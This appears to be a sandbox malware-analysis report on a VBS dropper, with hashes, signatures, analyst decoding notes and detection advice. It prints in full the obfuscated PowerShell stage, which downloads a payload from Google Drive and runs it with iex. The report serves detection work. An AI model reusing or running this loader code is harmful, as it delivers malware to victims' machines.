Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
submitted
30-04-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs
Resource
win10v2004-20240419-en
General
-
Target
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs
-
Size
8KB
-
MD5
a0ea5a34494368d9e1375f1e5990fdaf
-
SHA1
54045ae962c9bdd612a9be947442086fc5bcd44c
-
SHA256
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da
-
SHA512
fd7510ee1a0de297c9d4fab4ac7df7f6af7b5aa201d38773aef881ecf766af8d9ecdd4a0958edfced900d416e977a099b351272a8e26698850f0263e86d96ebd
-
SSDEEP
192:spKsbUuCUwy2riaB/Y4Bf7f102btBF8uDrq0wVHZsPpsp/dp93KqcMd5JQmJr9Pv:spKsbUuCUwyIiu/xfB0itv84rTm5gsxV
Malware Config
No configuration was extracted automatically, but the PowerShell stage below decodes statically. Inangulate79 builds each string by taking every sixth character of its argument starting at index 5 ($Pensionsreglerne=5, step 6, via Substring(i,1)), and Foreprovided invokes the decoded $Saarbarheds ("iex") on the result. Read in order, the decoded strings show (this rendering appears to have collapsed repeated spaces, so exact values should be re-derived from the raw .vbs rather than copied from here): a Firefox-style User-Agent (Mozilla/5.0 ... Firefox/121.0) set on a System.Net.WebClient; a Google Drive direct-download URL (https://drive.google.com/uc?export=download&id=...) held in a list split on '>' so several fallback URLs can be carried; a Set-Content to a file under T:\ followed by "if (test-path T:\...) {exit}", which looks like an environment/anti-analysis check; a download loop that writes to %appdata%\Stippled107.une (the path comes from the cmd.exe "echo %appdata%\Stippled107.une" child seen below) and retries with Start-Sleep 4 until Test-Path succeeds; then Get-Content, [System.Convert]::FromBase64String, ASCII.GetString and iex of .Substring(321269, 28770). The next stage is therefore not present in this report: no dropped-file or further process signature is listed, so it most likely did not execute in this run and Stippled107.une has to be retrieved separately for analysis.
Signatures
-
Blocklisted process makes network request — 2 IoCs
flow 3: pid 2148 powershell.exe
flow 5: pid 2148 powershell.exe
Both requests come from the child PowerShell stage, consistent with the WebClient.DownloadFile retry loop decoded from its command line; correlate them with the drive.google.com flows listed next.
Legitimate hosting services abused for malware hosting/C2 — 1 TTP, 2 IoCs
flow 2: drive.google.com
flow 3: drive.google.com
The decoded download URL is a Google Drive direct-download link of the form https://drive.google.com/uc?export=download&id=<file id>. Because the Drive file id is trivially rotated, detection should also key on the host artifact %APPDATA%\Stippled107.une and on powershell.exe reaching drive.google.com with a spoofed Firefox User-Agent, not on the id alone.
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2148 powershell.exe -
Suspicious use of AdjustPrivilegeToken — 1 IoC
Token: SeDebugPrivilege — pid 2148 powershell.exe
Treat this as a low-specificity indicator on its own (PowerShell hosts frequently enable SeDebugPrivilege regardless of script content); weight it together with the network and download behaviour rather than in isolation.
Suspicious use of WriteProcessMemory — 6 IoCs
PID 3000 (WScript.exe) wrote to memory of PID 2148 (powershell.exe), procid_target 28 — recorded 3 times
PID 2148 (powershell.exe) wrote to memory of PID 2636 (cmd.exe), procid_target 30 — recorded 3 times
Both writes are from a parent into the child it has just created (WScript.exe → powershell.exe → cmd.exe, matching the process tree below), so this is consistent with ordinary process creation rather than injection into an unrelated process; the repeated rows are the same relationship logged three times. The cmd.exe child is the "echo %appdata%\Stippled107.une" helper decoded from the PowerShell stage.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Geleddernes = 1;$Arbejdsdatabasen='Substrin';$Arbejdsdatabasen+='g';Function Inangulate79($Entrechat){$Pakkeliste=$Entrechat.Length-$Geleddernes;For($Pensionsreglerne=5; $Pensionsreglerne -lt $Pakkeliste; $Pensionsreglerne+=(6)){$Sommerlejre+=$Entrechat.$Arbejdsdatabasen.Invoke($Pensionsreglerne, $Geleddernes);}$Sommerlejre;}function Foreprovided($Saddelmagervrkstedet){. ($Saarbarheds) ($Saddelmagervrkstedet);}$Brookless=Inangulate79 ' ybarMSat rorabboz .ordi Saa,l .osalDioceaTorre/ Orde5Benzo. L,ri0P,yto Dyste(BdetaWOptimiHolomnS raydKir.eoTr phwOkto,s ver BaglyNPullbTAffin V tha1.rone0Kniv,.Uder 0 Phot; Srud ForbrWregneiJernbn ,ant6Menne4Delta;Gnu.b BajoxSt.rk6Komma4Reper; Utro SysterSnesevGodtg:Hjemg1Troml2agen,1Spr n.Fence0N.ate)Vej,e Unw,G Bo ke Ha kcNoniskUnpeaoRetro/Ponde2chemo0Tabu 1Fag l0Biang0 Emen1Nonop0Cl.pp1Skide OffenFJuniaiBu lirbetonejannyfDelusoCon,ex P,og/ rig.1Cris.2Siles1Tumul..ucci0 Hand ';$Prosektor=Inangulate79 'UtilfUAnanisMi roeMillirKup.a- ShesASkgekgBrickeSvrvgn Kla t C.mm ';$Skridtmaaleres=Inangulate79 '.rveoh crett ithot Myt pKarets Ko.r:.etor/ Assi/ ParadRegior fag iBurblvEmotiePrigg.KambagKrebioMonzoo Platgcoultl.refieTelet.Ti recForfaoSkjormastra/kravluPse dcUnder?,opoge .kanxTanklpAcredoMiddlrPerist G us=Perfod CocaoShirtwBage.nHyleglSmle oknoc.aZoomedDuckp&Gal,ci,nhumd norm=Copul1SdendcGlimm4Bver,JKaffeFUndev6Misd,w R.pa3Flamm0Mark.tPy.rocB.skamRigleCHet rpAmovaX ofagJ Filmmtr,inO.inlaBOverfj.hikahNoncozS ereGan gnvEcca 8 Ulst9 Unafrga,mawBriss2Venstx datoDTrfsie petatunimb ';$Amianthus=Inangulate79 'Raadi>a.amn ';$Saarbarheds=Inangulate79 'BajerichriseUfdtbxAnt.b ';$Krystalfrekvensen='Burds';Foreprovided (Inangulate79 ' StirSSoloeeDa.hntLeuco-RimpiC EkstoMelodn Adalt di,seBlegvn SkrmtIrrec Finla-behanPDeputaCaladtFiredh nro KanawTSeko : Tale\GrockK EyesoTematnDi tak .npeu Ps.ur Ve,sr Fo,seLejrsnFanfoc ,enneHippis 
Shi aLingumSu.dhf .lmiutikmpnSagfrdS.riaeGoodwnPyxeseKolonsFr sn.ChemotWarmnx InsetTagvi endw-Flyv,V IrreaCentrlUdbliuToothe Grei nontr$PrdisKUltrarPri,tyS agts Ba nt Su,ea ksemlCar if Favor ch.leSupinkMelanven ereSammenHovedsCosmee,acspnNelso; Skro ');Foreprovided (Inangulate79 'F.rreiBlgetf Fami E,str(Gl.ttt K,zaeFravasLuccatLeat,-zuniap,ranuaChapotTrifoh Krn FilhTPhola:Stads\Co peKWrabboLrebrnM,juskMozamuBetaerOrdinrPr.sseBoraznKaldecAnmeleT,angsMimera CathmMullafSvmmeuSem,nn ErfadKalkpe enmanHeksee Ov rsRes e. Pedet Tur.xConc,t R,pe) Aphi{sweete Pyl,x binsioutfetAldol}Lands;Gerr ');$judaica = Inangulate79 ' AnedeFlagac Re.ohDatacoHidr oxyd %BarbeaNinnipD terpStvekdOktaeaNotostPo.tnaSeatm% pslu\Ud.oeSPiarot Ora.iKinespEksprpWe.ldl Ba.te Domed Lnov1Forva0Armar7Mimic.BekliuSkyggn .none Jord Krepn&Orbic&Gulvm ataxoePeriecSlughh Stero Gas Angaa$Diabe ';Foreprovided (Inangulate79 'Sk kl$sharpg Besml TppeoL.dssbDisk,aBlitzlSpiri:KlappFNegleaTordelcaprilPhysioStenzs brnde ismarM.ress Mrke1glass6Porte9Rogat=Riob (AnthocNonb.mSpecidMenin Banne/Tinsoc onul Milie$Trindjcivilu ummad UnsoaMilieiRukanc .ineaKonst)Garne ');Foreprovided (Inangulate79 'Skudd$ lbegCemenlOveruoBil,obMoralaSonorlRejoi:DiskeEpartiuStavrbWapsda SoutcA,rodtFrikeeR giorki hoiTeazeuHu rmm stra=Dkke.$PewinSFlarykD,ssorDanewikkkendR,ichtDiagnmTsninaKejs,a.nosclAfk ve,irglrKlargeBegynsDe,ig. 
Babys.ilhapUnderlCu.tii PhiatUnde (Travh$Phen,ASmud mCom,liV lutaE,ghtnPluknt FredhVaginu alkus,reel)Dimpl ');$Skridtmaaleres=$Eubacterium[0];Foreprovided (Inangulate79 'Venek$Generg SyntlP.oduoS.raybHusm,a.rokllHvlej:sammeOTr,sovVisuaeCata,rNone.iHane,sQuinieDublx1Le.es0 Prer6Ne ha= H.nsN Earie B,omwTrakt-PairpORivinbPhialjFremmebr.kic OvertPour, nonpaSCaloryIn,ogsVaa et Sp neOvenpmGonoc.PleisN.jlfoeAutovtFemka.U sttWDepeneundstbVgtklC JustlFl,keiPetraeLutten,nstatMetha ');Foreprovided (Inangulate79 'Lysaa$ BiorOMuzakv Un.oePrivar CentiNotatsUdsoneSitop1Slavo0 Syer6,reco.martyH Dy.meBa.eaaUnarcdFreg,eCivilrSignasRevol[,lves$sladrP Udb,rIndenoPsychs Tw,neexpirkUns,atBa lvo OverrSpise]Norma= kend$DanskBAlbinrTotaloangstoDedikkTotr,lPig,teNon.ysFamilsQ.esa ');$Sew=Inangulate79 '.yrenOPropovsaliceLsketrMusiciRh,mnsVrtsle err1Kuppe0Anfre6Udha .ParkiDProgroMad owScrolnSocialGladdoSaddea Inged MuroF sub,iMercalOrr.peInane(Conte$ReheaSSrb skSludfrBeraaiPer.pdFrafatCacogmPoi taOmostaUdplal retreJournrDenedeStdpus Stou,K,rak$PerfoP ShoohTabelo UnmerChafeoCavalmSp.oge ProctMot rr Pibeyforsp)s,otg ';$Sew=$Fallosers169[1]+$Sew;$Phorometry=$Fallosers169[0];Foreprovided (Inangulate79 'Ensre$formagSkottl.oinmo TaffbPamflaidnerlInflu:LagenbbyzonoOve,fvHodadiAfgannprivaiTrametYeggsiidrt,eReg osForst= ,las(KnottT Vadeesti.esCinchtLandb-Gr.seP TastaBilagtSynk,h.rest Jordl$ UndeP PlanhMagneo ,litr L,cho estam redde AlvetSidstrDicyey Atta)Be lu ');while (!$bovinities) {Foreprovided (Inangulate79 'Mo,by$Jenkog aretlStorkoSlgtsbholliaCharaltr pe: ErhvMDempnoEksplrUds,urNonrahTran u.aratiDiscon unta= .ang$ an.ltLegemrGeniau Systede ut ') ;Foreprovided $Sew;Foreprovided (Inangulate79 'Saml.SAabnit,ereoaC,nstr Toggtmis,r-.abriSV.llulKlicheFristeI,aqip Nege unim4 Town ');Foreprovided (Inangulate79 'Slugg$umenngtypeblout,hoIndsibPrcisaSystel nmak:guldebM.todoTo.mavL,tiniMundsnflintikloaktReligi He.leH tersZebue=,ight( StabTAmmoneHu drslavistS.ran-Be krPCirkuaRig.ut Tak h,kste 
Kolpo$SuberPVelathPamfloBiogerL.geboAgricmNatureAftaltHaulerRespoyAkkum)G.ads ') ;Foreprovided (Inangulate79 ' slid$Abst.gAutoflGladiodiaclb obliaAntirl ronk:SprutCG.insagutterRootln Equii Aaref FrysiToolseProvod Genn1Stabe9 Uund3 Hule=Iyars$Re,stgFeelilSpildoMask bTurnpaLog.elBill,:Lay,uSBrus.l MiskyMindenI ritgNonv,nGugleiBarr.nestaegTrunceScenorErysinEmbede ,jansDataf+Exfig+Slagv%Stddm$J,tbrEFunktuMe asbTekniaJunnicYanintPre,leBrin rInexpi Dobbu Ove mFonom.CulotcRredfo Unduu,aston CametKl.ch ') ;$Skridtmaaleres=$Eubacterium[$Carnified193];}Foreprovided (Inangulate79 'Histo$blankgUngsklJagtro.kolebTopotaBeslulK.nku:BlaffPOverroAfr,asPaatvtSkyllv DisksD.coynExtroeT.oppr Aco Skri=Feebl SkurkGsoundeSkilrtlyric-GeomoCAng loSupernDimplt AkvaeHardenUni,vtB.nda Kash$F.ambPSe arh.yskoo neutrAllisoYark,mGtevieKildetmoderrV entyVmmel ');Foreprovided (Inangulate79 ' Opr $EvanggUnhoilArango .atrbUdboraDac,slHea.e: saliGHa edoChalcl GraagCer.uo Hnget confh .iruaSeng, Pall=Grano Nyczi[Torp SForsky.attesAlephtDommeeMast,mL.ere.IndolCSte.ioproexnBrnevv IndueKurisrDechitBesae] U me: Bris:IliasFKlo srImmi,oBub.em ap.eB PantaNonassdepileEro.i6Squas4Posi SAcrotttransr previ.entrnGn,isg nacc(Stabl$InterPBloodoOmfatsPill,tBjld.v I,cis Aul.nL,onseGunshrSenat)Brygg ');Foreprovided (Inangulate79 'Opslu$TrykkgRoughlTilgoo ranibCowpea helolkodev:SpidsFUnderi,atursHyl,ekBriefeOfferrFejltiKronefMonseoSkyldrdowngefoedtnther.iPaladnirreggFagu sUnloo Squin= Peri No fr[OverpS K.ttyPhalasSkibstS ruteMidermstre,.Bra iTLenete DdbixDorsetStan.. 
Ac,oEBiomenSi,elcZaphroAlcaydMu,hmi SpecnDiaphgTankb]Hagge:Manip:Klum AOverbSCh.moCFor aIPomacINoume.acemiGankuse,megmt Lat S.ndertKynikr s.ppiGear,ndynamgBr.kk(Het r$OutgaGSvejsoBethrlF,erbgU tado AdretUnthehUnneeaAhnfe) f,gk ');Foreprovided (Inangulate79 ' Anke$Col,ngLavrylJasteo MellbFrosca ndelPosta:,aiwaORetsvvFuldte AnnorImparbAnmela relir ManorIoanneWilkin ermwn oghaeCac ds ndss Hern=Disse$T lsmF MuriiAfbl,s VagtkDeli.ePyxidr ouldiTraumfRaglaoUn,errMa.cee Fa.dnT.btyianal nPaestgAspresUdv,k.PlatysEstruuRemoobBinyrsDisd.tBeraprI turiMarmonEks ogLiefl(Repti3 Sulf2T,pht1 Vitu2Han.a6 onde9centr,Klutz2Excul8Eksek7Strep7.tepg0Pan u)Kenss ');Foreprovided $Overbarrenness;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stippled107.une && echo $"3⤵PID:2636
-
-